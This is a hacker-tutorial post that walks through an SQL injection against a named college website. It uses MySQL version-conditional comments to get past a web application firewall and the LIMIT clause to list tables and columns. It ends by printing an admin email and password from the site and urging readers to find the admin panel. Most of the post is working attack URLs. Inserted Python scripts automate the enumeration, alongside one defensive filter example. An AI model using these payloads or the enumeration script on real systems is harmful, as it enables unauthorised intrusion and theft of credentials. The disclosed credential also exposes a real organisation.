SQLi WAF (Web Application Firewall) Bypassing And The LIMIT Clause

06:24
Aslam-0-Alaikum, PrOleEetS Sh3ll HaXor here.. Today I am going to show you what a WAF (Web Application Firewall) is and how to get past one while doing SQL injection...

We are also going to learn a little about MySQL's LIMIT clause.

Let's start the tutorial... :p

We have a website vulnerable to SQL injection. Let's see...
http://www.scit.edu.in/announce.php?id=14'

Appending a single quote to the id parameter breaks the query and the page shows an error, so the parameter is being concatenated into the SQL statement unsanitized: the site is vulnerable to SQLi..

Now we are going to find the column count of the query behind this page. ORDER BY n sorts by the n-th column of the SELECT and raises an error when n is larger than the number of columns, so we start high and lower n until the error disappears. The trailing --+ becomes "-- " after URL decoding (the + is a space), which is the line comment MySQL needs in order to discard the rest of the original query... :p

Open Hackbar and start with order by 100--+

http://www.scit.edu.in/announce.php?id=14' order by 100--+
We can see an error on the page....

Now check with order by 10--+

http://www.scit.edu.in/announce.php?id=14' order by 10--+

We can still see an error on the page...

Now check order by 4--+

http://www.scit.edu.in/announce.php?id=14' order by 4--+

Still an error.. Check with order by 3--+

http://www.scit.edu.in/announce.php?id=14' order by 3--+

Now we see that there is no error.... That means the column count is 3.

Now find the displayed (so-called vulnerable) columns with a UNION SELECT statement. The id is made negative (-14) so the original row matches nothing and only the values from our UNION row get rendered.... Let's check...

http://www.scit.edu.in/announce.php?id=-14' +UNION+ALL+SELECT+1,2,3 --+
As we can see, when we use UNION SELECT the site answers with an error page reading "NOT ACCEPTABLE" (an HTTP 406) instead of a database error.

That response does not come from MySQL: a WAF (Web Application Firewall) in front of the application is matching the UNION SELECT keywords and dropping the request... Now we have to bypass it...

This WAF can be bypassed with MySQL version-conditional comments, a slash, an asterisk, an exclamation mark and a five-digit version number: /*!00000 ... */ (they are MySQL comments, not HTML ones). MySQL executes whatever is inside /*!NNNNN ... */ when its own version is at least NNNNN, and 00000 is satisfied by every version, so the server still sees UNION and SELECT while a signature looking for the bare keywords no longer matches. A /*! ... */ with no version number is executed unconditionally too.

These are the "magic" comments people use to bypass WAFs...

Now let's rebuild our query by wrapping the keywords in these comments...

Let's see...
http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,2,3 --+


As we can see the numbers 2 and 3 on the page, which means columns 2 and 3 are displayed: those are the ones we can replace with our own expressions....
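The following is an added example, not code from the original post or from the target site, showing why the wrapped payload slips past a signature and how a filter should see through it: a naive rule that looks at the raw parameter is fooled by /*!00000UNION*/, while a rule that first rewrites the input the way MySQL's parser reads it is not. The server version number is an assumption made for the demo.

```python
import re
from urllib.parse import unquote_plus

# Naive signature: the classic "UNION ... SELECT" sequence, matched on the raw parameter value.
UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)

# Assumed MySQL version of the target, encoded the way /*!NNNNN ... */ comments use it
# (5.7.33 -> 50733). This is an assumption for the demo, not a value from the post.
ASSUMED_SERVER_VERSION = 50733

CONDITIONAL_COMMENT = re.compile(r"/\*!(\d{5})?(.*?)\*/", re.DOTALL)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)


def naive_waf_blocks(raw_param: str) -> bool:
    """Signature match on the parameter as sent; this is what tripped on the first UNION payload."""
    return UNION_SELECT.search(raw_param) is not None


def normalize_mysql(raw_param: str, server_version: int = ASSUMED_SERVER_VERSION) -> str:
    """Rewrite the parameter into what MySQL's parser actually executes.

    /*!NNNNN text */ is a version-conditional comment: the server runs `text` when its version
    is >= NNNNN (no number means 0), so /*!00000UNION*/ is plain UNION on every server, while
    /*!99999 UNION */ is silently dropped. Ordinary /* ... */ comments are removed entirely.
    """
    decoded = unquote_plus(raw_param)  # '+' and %xx in the query string become real characters

    def keep_or_drop(m):
        required = int(m.group(1)) if m.group(1) else 0
        return f" {m.group(2)} " if server_version >= required else " "

    text = CONDITIONAL_COMMENT.sub(keep_or_drop, decoded)  # conditional comments first
    text = PLAIN_COMMENT.sub(" ", text)                     # then whatever ordinary comments remain
    return re.sub(r"\s+", " ", text).strip()


def hardened_waf_blocks(raw_param: str) -> bool:
    """The same signature, applied to the normalized text instead of the raw parameter."""
    return UNION_SELECT.search(normalize_mysql(raw_param)) is not None


if __name__ == "__main__":
    # Parameter values as they appear in the post's URLs (still URL-encoded).
    plain = "-14' +UNION+ALL+SELECT+1,2,3 --+"
    wrapped = "-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,2,3 --+"
    print(naive_waf_blocks(plain), naive_waf_blocks(wrapped))      # True False
    print(hardened_waf_blocks(wrapped), normalize_mysql(wrapped))  # True -14' UNION ALL SELECT 1,2,3 --
```

The version rule cuts both ways: a keyword wrapped in /*!99999 ... */ is discarded by the server, so the normalizer drops it as well and the query would fail anyway; a production rule should still treat any /*! in a user-supplied parameter as suspicious rather than relying on the version arithmetic.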

Now let's start enumerating tables by replacing column 2 with our query in Hackbar. The table_schema=database() condition restricts the listing to the database the application itself is using...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat(table_name),3 from information_schema.tables where table_schema=database() --+

Still the WAF error... The filter also matches the names table_name, information_schema.tables and table_schema, so we have to wrap those in the same magic comments (/*! */) to bypass it...

Let's see...
http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() --+

As we can see, the first table name (aca_calendar) is shown on the site...

Only one row fits in the single displayed column, so to extract the other tables we use LIMIT offset,count (limit 1,1, limit 2,1 and so on). The offset is zero-based: limit 0,1 is the first row, limit 1,1 the second, limit 2,1 the third...

Let's see...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() limit 2,1--+
As we can see, the third table name is now shown.. We keep increasing the offset until we find the admin table...

Let's move on..

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() limit 22,1--+




When we reached limit 22,1 we found the admin table (myadmin)... (group_concat(table_name) would list every table in one request, but it is often filtered too and its output is capped by group_concat_max_len, 1024 bytes by default.)
Remember that table names will be different on other websites....

Now let's enumerate the columns of table (myadmin). The table name is written as the hex literal 0x6d7961646d696e ("myadmin"), which MySQL reads as a string without us having to send any quote character; note that this query filters on table_name only, so a table of the same name in another schema on the server would also match..

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e--+

Executing our query (no LIMIT, so offset 0) gives us the first column name (Id)..

Now we again use the LIMIT clause to enumerate the other columns...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e limit 1,1--+

Using limit 1,1 we found the column name (UserName)...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e limit 2,1--+


Using limit 2,1 we found the column name (PassWord)...
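The script below is an added example, not code from the original post or the target site; it automates the two LIMIT loops above (tables, then columns): it builds the LIMIT n,1 payloads with the same conditional-comment wrapping, hex-encodes the table name the way the post does, URL-encodes each request, and walks offsets from 0 until the page stops returning a row. It goes one step beyond the post by adding the table_schema=database() filter to the column query as well. The target URL, the fetch function and the row lists it returns are constructed stand-ins so the script runs offline; on a real engagement fetch would perform the HTTP GET and scrape the value out of the spot where column 2 is rendered.

```python
import re
from urllib.parse import quote, unquote

# Constructed stand-in for the target; not the site from the post.
BASE_URL = "http://target.example/announce.php"
PARAM = "id"
ORIGINAL_ID = "14"


def mysql_hex_literal(s: str) -> str:
    """'myadmin' -> '0x6d7961646d696e': MySQL reads this as the string, no quote character needed."""
    return "0x" + s.encode().hex()


def cc(word: str) -> str:
    """Version-conditional comment /*!00000WORD*/; MySQL executes WORD on every server version."""
    return f"/*!00000{word}*/"


def union_prefix() -> str:
    # Negative id so the original row matches nothing and only the UNION row is rendered.
    return f"-{ORIGINAL_ID}' {cc('UNION')} ALL {cc('SELECT')} 1,"


def table_name_payload(offset: int) -> str:
    return (f"{union_prefix()}concat/*!(table_name)*/,3 from /*!information_schema.tables*/ "
            f"where /*!table_schema*/=database() limit {offset},1-- ")


def column_name_payload(table: str, offset: int) -> str:
    # Same schema filter as the table query, so a same-named table in another schema is not mixed in.
    return (f"{union_prefix()}concat/*!(column_name)*/,3 from /*!information_schema.columns*/ "
            f"where /*!table_schema*/=database() and /*!table_name*/={mysql_hex_literal(table)} "
            f"limit {offset},1-- ")


def to_url(payload: str) -> str:
    # quote() renders the trailing space of '-- ' as %20; the post's '--+' is the same thing to MySQL.
    return f"{BASE_URL}?{PARAM}={quote(payload, safe='')}"


def enumerate_rows(payload_for_offset, fetch, max_rows: int = 200) -> list:
    """Walk LIMIT n,1 from n=0 until the page shows nothing.

    Offsets are zero-based: limit 2,1 is the third row, not the second. When the offset runs
    past the last row the UNION contributes nothing and the displayed slot is empty (None here).
    """
    rows = []
    for offset in range(max_rows):
        value = fetch(to_url(payload_for_offset(offset)))
        if value is None:
            break
        rows.append(value)
    return rows


def make_fake_fetch(rows):
    """Constructed stand-in for HTTP GET plus scraping column 2: rows[offset], or None past the end."""
    def fetch(url):
        query = unquote(url.split("?", 1)[1])
        offset = int(re.search(r"limit (\d+),1", query).group(1))
        return rows[offset] if offset < len(rows) else None
    return fetch


if __name__ == "__main__":
    tables = make_fake_fetch(["aca_calendar", "events", "myadmin"])      # constructed table list
    print(enumerate_rows(table_name_payload, tables))
    columns = make_fake_fetch(["Id", "UserName", "PassWord"])            # constructed column list
    print(enumerate_rows(lambda n: column_name_payload("myadmin", n), columns))
    print(to_url(table_name_payload(2)))
```

Stopping on the first empty response is the same rule you apply by hand in Hackbar; if the application renders something even when the UNION row is empty, make fetch return None on that marker instead.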

Now extract the data from the UserName and PassWord columns of table (myadmin). The query below selects PassWords; the column name has to match exactly what the column enumeration returned, so use that. The 0x3a is a hex-encoded colon used as a separator between the two values...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(UserName,0x3a,PassWords)*/,3 from myadmin--+


As you can see we found the data (info@scit.edu.in:DG9227455664) from the username and password columns..
Where (info@scit.edu.in) is the username and (DG9227455664) is the password...

Find the admin panel and enjoy.. :p


This was my first tutorial, in which we learnt about bypassing a WAF and using the LIMIT clause...

Thanks to my friend ToolKit....

Stay connected with us... :p
